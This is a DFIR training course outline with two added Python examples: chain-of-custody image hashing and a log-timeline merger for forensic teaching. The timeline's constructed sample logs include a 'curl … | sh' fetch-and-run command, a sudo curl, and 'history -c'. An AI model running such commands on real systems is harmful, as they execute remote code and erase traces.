Course Outline
The 5-day Digital Forensics & Incident Response (DFIR) course introduces participants to DFIR concepts and the goal-oriented techniques used in practice. Participants will learn how to investigate an incident, how to gather supporting forensic data, and how to handle that data. The course features hands-on simulations provided by @Cywar, a gamified training and assessment platform by HackerU Solutions.
Upcoming Meetings
There are no upcoming meetings for this course. Contact us to schedule this course, which will be customized specifically for your organization.
info@hackerupro.com
Modules
Introduction to DFIR
- Introduction to DFIR
- DF vs IR vs TH (digital forensics, incident response, threat hunting)
- Incident Response planning
- Targeted artifacts
- DFIR use-cases
- DFIR Toolset
- SANS & NIST
Incident Response - Preparation
- Defining assets & values
- CIA triad (confidentiality, integrity, availability)
- Risk management
- Roles & Responsibilities
- 4- and 6-stage IR lifecycles
- Creating IR Plan
- DRP & BCP
- GRC
- ATT&CK
- Compliance – ISO, GDPR, HIPAA, PCI DSS
Incident Response - Response
- SOC Operation & Lifecycle
- Identification & Scoping
- Containment
- Intelligence gathering
- Eradication
- Chain of custody
Data Acquisition
- Dead System Analysis
- Live System Analysis
- Drive Cloning
- Image Mounting
- Memory Dumping
- Evidence Documentation
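The Data Acquisition module covers cloning, imaging and documenting evidence. The following is an added example, not course material or Cywar lab code, showing the integrity step that ties those items together: an acquired image is hashed at acquisition, re-hashed on every hand-over, and each check is appended to a chain-of-custody log. The image is a constructed file of random bytes standing in for a real clone; the handler names and log format are assumptions.

```python
"""Hash an acquired image and keep a chain-of-custody record.

Added example (not the course's or Cywar's code). The image is a constructed
random-byte file; handler names and the JSON-lines log format are assumptions.
"""
import hashlib
import json
import os
import tempfile
from datetime import datetime, timezone

CHUNK = 1024 * 1024  # stream in 1 MiB pieces so multi-GB images never fit in RAM


def sha256_file(path):
    """Stream-hash a file and return the hex digest."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(CHUNK), b""):
            h.update(chunk)
    return h.hexdigest()


def make_sample_image(path, size=256 * 1024):
    """Constructed stand-in for a cloned drive: random bytes, not real evidence."""
    with open(path, "wb") as f:
        f.write(os.urandom(size))
    return path


def custody_entry(image_path, action, handler, expected_sha256=None):
    """Build one custody record; 'verified' is False if the hash no longer matches."""
    digest = sha256_file(image_path)
    return {
        "timestamp": datetime.now(timezone.utc).isoformat(),
        "image": os.path.basename(image_path),
        "action": action,
        "handler": handler,
        "sha256": digest,
        "verified": expected_sha256 is None or digest == expected_sha256,
    }


def append_custody_log(log_path, entry):
    """Append-only JSON-lines log: one record per hand-over or verification."""
    with open(log_path, "a", encoding="utf-8") as f:
        f.write(json.dumps(entry) + "\n")


def demo(workdir=None):
    """Acquire, hand over, then detect a modified image. Returns the three records."""
    workdir = workdir or tempfile.mkdtemp(prefix="dfir-")
    image = make_sample_image(os.path.join(workdir, "evidence-001.raw"))
    log = os.path.join(workdir, "custody.jsonl")

    acquired = custody_entry(image, "acquired", "analyst-a")
    append_custody_log(log, acquired)

    # Hand-over: the receiver re-hashes and compares against the acquisition hash.
    received = custody_entry(image, "received", "analyst-b", acquired["sha256"])
    append_custody_log(log, received)

    # Simulated integrity failure: a single byte appended to the image.
    with open(image, "ab") as f:
        f.write(b"\x00")
    recheck = custody_entry(image, "verified", "analyst-b", acquired["sha256"])
    append_custody_log(log, recheck)
    return [acquired, received, recheck]


if __name__ == "__main__":
    for record in demo():
        print(json.dumps(record))
```

In a real acquisition the source device is hashed behind a write blocker as well, so the image hash can be compared against the original media and not only against itself; the record above is the minimum that lets a later reviewer prove the image was unchanged at each hand-over.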
Live Forensics
- Artifacts on a Windows computer
- Browser History
- USB History
- DNS Cache
- Prefetch
- MRU
- NirSoft tools
Windows Forensics
- Windows DF Specifics
- NTFS
- ADS & MFT
- File Carving
- Registry Forensics
- Forensics using PowerShell
Memory Analysis
- Memory structure
- Memory analysis tools
- Volatility Breakdown & Usage
- Process exploration
- DLL inspection
- Acquiring memory artifacts
Linux Forensics
- Linux Filesystems
- Network configuration
- Login information
- Bash history
- Identifying Persistence
- Logfile Analysis
Log Analysis & Timelines
- Windows EventLog
- PowerShell logs
- Timeline analysis
- DF Timeline
- Log2timeline
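Timeline analysis means normalising events from different sources to one clock and ordering them. The following is an added example, not course material and not log2timeline/plaso code, that does this in miniature for three constructed sources: a Windows Security log export, a Linux auth.log, and a bash history with timestamps. The host timezone (UTC+1) and the syslog year are assumptions, as is every sample line.

```python
"""Merge heterogeneous logs into one UTC-ordered mini timeline.

Added example (not course material, not plaso). All log lines are constructed;
the auth.log host timezone and year are assumptions because syslog records neither.
"""
import re
from datetime import datetime, timezone, timedelta

# Constructed Windows Security export: (UTC ISO timestamp, EventID, message)
WIN_EVENTS = [
    ("2024-03-05T10:02:17Z", 4624, "Logon type 10 for user alice from 10.0.0.5"),
    ("2024-03-05T10:03:40Z", 4688, "New process created: powershell.exe (parent: explorer.exe)"),
]

# Constructed auth.log lines; classic syslog has no year and no timezone.
AUTH_LOG = """Mar  5 11:01:55 web01 sshd[2211]: Accepted publickey for bob from 10.0.0.9 port 51112 ssh2
Mar  5 11:04:02 web01 sudo: bob : TTY=pts/0 ; PWD=/home/bob ; USER=root ; COMMAND=/usr/bin/curl http://10.0.0.5/x.sh"""
AUTH_LOG_TZ = timezone(timedelta(hours=1))  # assumption: web01 runs at UTC+1
AUTH_LOG_YEAR = 2024                          # assumption: year of the case

# Constructed bash history written with HISTTIMEFORMAT set: "#<epoch>" precedes each command.
BASH_HISTORY = """#1709633100
curl http://10.0.0.5/x.sh | sh
#1709633160
history -c"""

SYSLOG_RE = re.compile(r"^(\w{3})\s+(\d{1,2}) (\d{2}:\d{2}:\d{2}) (\S+) (.*)$")


def parse_windows(events):
    """Windows export is already UTC; just attach the tzinfo."""
    for ts, event_id, msg in events:
        when = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
        yield (when, "win:security", f"EventID {event_id}: {msg}")


def parse_syslog(text, year, tz):
    """Re-attach the missing year and host timezone, then convert to UTC."""
    for line in text.splitlines():
        m = SYSLOG_RE.match(line)
        if not m:
            continue
        mon, day, hms, host, rest = m.groups()
        local = datetime.strptime(f"{year} {mon} {day} {hms}", "%Y %b %d %H:%M:%S").replace(tzinfo=tz)
        yield (local.astimezone(timezone.utc), f"{host}:auth.log", rest)


def parse_bash_history(text, user):
    """Epoch comment lines are UTC by definition; commands without one are undated."""
    when = None
    for line in text.splitlines():
        if line.startswith("#") and line[1:].isdigit():
            when = datetime.fromtimestamp(int(line[1:]), tz=timezone.utc)
        elif when is not None:
            yield (when, f"bash:{user}", line)


def build_timeline():
    """Return all events as (utc_datetime, source, message), oldest first."""
    events = []
    events.extend(parse_windows(WIN_EVENTS))
    events.extend(parse_syslog(AUTH_LOG, AUTH_LOG_YEAR, AUTH_LOG_TZ))
    events.extend(parse_bash_history(BASH_HISTORY, "bob"))
    return sorted(events, key=lambda e: e[0])


def render(timeline):
    """One line per event in the normalised form an analyst reads top to bottom."""
    return [f"{ts.strftime('%Y-%m-%dT%H:%M:%SZ')} {src:<16} {msg}" for ts, src, msg in timeline]


if __name__ == "__main__":
    for line in render(build_timeline()):
        print(line)
```

The point of the exercise is the timezone step: without converting web01's local clock the sudo entry appears after the bash `curl | sh`, which reverses cause and effect. Real cases also need clock-skew checks between hosts before the order can be trusted.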
Threat Hunting
- Threat Hunting
- Threat intelligence
- Collecting IoCs
- Malware characteristics
- from DF to TH
- Common Hiding Mechanisms
Network Forensics
- Traffic interception & Network Evidence
- Reverse Proxy
- Wireshark
- DF using Wireshark
- Common Protocol Analysis
- Zeek NSM
DFIR Simulation
- DF lab & Recap
Prerequisites
- Hands-on experience with Linux and Windows systems
- A solid understanding of networking infrastructure